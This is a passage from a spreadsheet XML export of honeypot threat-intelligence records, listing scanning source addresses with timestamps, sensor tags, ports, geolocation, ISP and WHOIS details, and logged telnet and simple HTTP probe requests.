    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:f1ef"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1124"/>
    <x v="1124"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T19:21:00"/>
    <d v="2025-04-22T19:01:12"/>
    <d v="2025-04-22T19:21:00"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d8:94c0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1125"/>
    <x v="1125"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T19:19:02"/>
    <d v="2024-12-15T06:44:40"/>
    <d v="2025-04-22T19:19:02"/>
    <n v="66"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="45"/>
    <s v="Jeollabuk-do"/>
    <s v="Jeonju-si"/>
    <s v="Jeonju-si (Pyeonghwadong 1(il)-ga)"/>
    <s v="1845453"/>
    <s v="NA"/>
    <s v="35.7969"/>
    <s v="127.14"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="KT"/>
    <s v="2003-10-27"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:de69:a993"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1126"/>
    <x v="1126"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T19:17:38"/>
    <d v="2025-03-27T10:22:51"/>
    <d v="2025-04-22T19:17:38"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="Seodaemun-gu"/>
    <s v="Seodaemun-gu"/>
    <s v="1836701"/>
    <s v="120013"/>
    <s v="37.5764"/>
    <s v="126.935"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2006-04-07"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7983:aff5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1127"/>
    <x v="1127"/>
    <s v="NA&amp;&amp;syn-066-061-096-154.res.spectrum.com"/>
    <x v="0"/>
    <d v="2025-04-22T18:51:37"/>
    <d v="2023-07-28T16:44:28"/>
    <d v="2025-04-22T18:51:37"/>
    <n v="1678"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_IRC_H19&amp;&amp;SMA-LAB_SMTP_H24&amp;&amp;SMA-LAB_NTP_H32&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;6667&amp;&amp;25&amp;&amp;123&amp;&amp;445&amp;&amp;1080&amp;&amp;3306&amp;&amp;44483&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="PA"/>
    <s v="Pennsylvania"/>
    <s v="Erie"/>
    <s v="Erie"/>
    <s v="5188843"/>
    <s v="16506"/>
    <s v="42.0591"/>
    <s v="-80.154"/>
    <s v="10796"/>
    <s v="Charter Communications Inc"/>
    <s v="Charter Communications Inc"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="2001-01-03"/>
    <s v="RR-MID-ATLANTIC"/>
    <s v="2011-07-06"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1994-07-27 04:00:00"/>
    <s v="2025-07-26 04:00:00"/>
    <s v="2024-07-22 05:41:39"/>
    <s v="['NS1.CHARTER.COM', 'NS2.CHARTER.COM', 'NS3.CHARTER.COM', 'NS4.CHARTER.COM']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited http://www.icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited http://www.icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited http://www.icann.org/epp#serverUpdateProhibited']"/>
    <s v="Domain Admin"/>
    <x v="19"/>
    <s v="NA"/>
    <s v="12405 Powerscourt Drive"/>
    <s v="::ffff:423d:609a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1128"/>
    <x v="1128"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T18:11:39"/>
    <d v="2023-07-31T12:07:15"/>
    <d v="2025-04-22T18:11:39"/>
    <n v="1873"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="NA&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H3"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;23&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="None"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '127.0.0.1', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7622:75bd"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1129"/>
    <x v="1129"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T18:11:05"/>
    <d v="2024-12-27T23:35:00"/>
    <d v="2025-04-22T18:11:05"/>
    <n v="179"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23&amp;&amp;57120&amp;&amp;38078&amp;&amp;38131&amp;&amp;38109&amp;&amp;80&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="30"/>
    <s v="Daejeon"/>
    <s v="Seo-gu"/>
    <s v="Gwanjeo-dong"/>
    <s v="8691930"/>
    <s v="302243"/>
    <s v="36.2947"/>
    <s v="127.333"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dd9e:8f43"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1130"/>
    <x v="1130"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T18:11:03"/>
    <d v="2024-07-28T02:19:20"/>
    <d v="2025-04-22T18:11:03"/>
    <n v="11918"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H3"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;22&amp;&amp;59055&amp;&amp;54935&amp;&amp;54945&amp;&amp;80&amp;&amp;9100&amp;&amp;16633"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '127.0.0.1', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e27:aa05"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1131"/>
    <x v="1131"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T18:10:37"/>
    <d v="2023-12-03T09:57:00"/>
    <d v="2025-04-22T18:10:37"/>
    <n v="1153"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_MT-CPA_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;59334&amp;&amp;25467&amp;&amp;50635&amp;&amp;55358&amp;&amp;55367&amp;&amp;55385&amp;&amp;9100&amp;&amp;80&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Sujeong-gu)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.4224"/>
    <s v="127.102"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d84:4eb5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1132"/>
    <x v="1132"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T17:51:43"/>
    <d v="2025-04-22T17:51:43"/>
    <d v="2025-04-22T17:51:43"/>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d9:f361"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1133"/>
    <x v="1133"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T17:29:18"/>
    <d v="2025-04-22T16:54:11"/>
    <d v="2025-04-22T17:29:18"/>
    <n v="47"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="WA"/>
    <s v="Washington"/>
    <s v="Walla Walla"/>
    <s v="Walla Walla"/>
    <s v="5814916"/>
    <s v="99362"/>
    <s v="46.08"/>
    <s v="-118.287"/>
    <s v="23265"/>
    <s v="Pocketinet Communications, Inc"/>
    <s v="Pocketinet Communications, Inc"/>
    <s v="business"/>
    <s v="Pocketinet Communications, Inc"/>
    <s v="2003-02-04"/>
    <s v="POCKETINET-1"/>
    <s v="2012-02-24"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
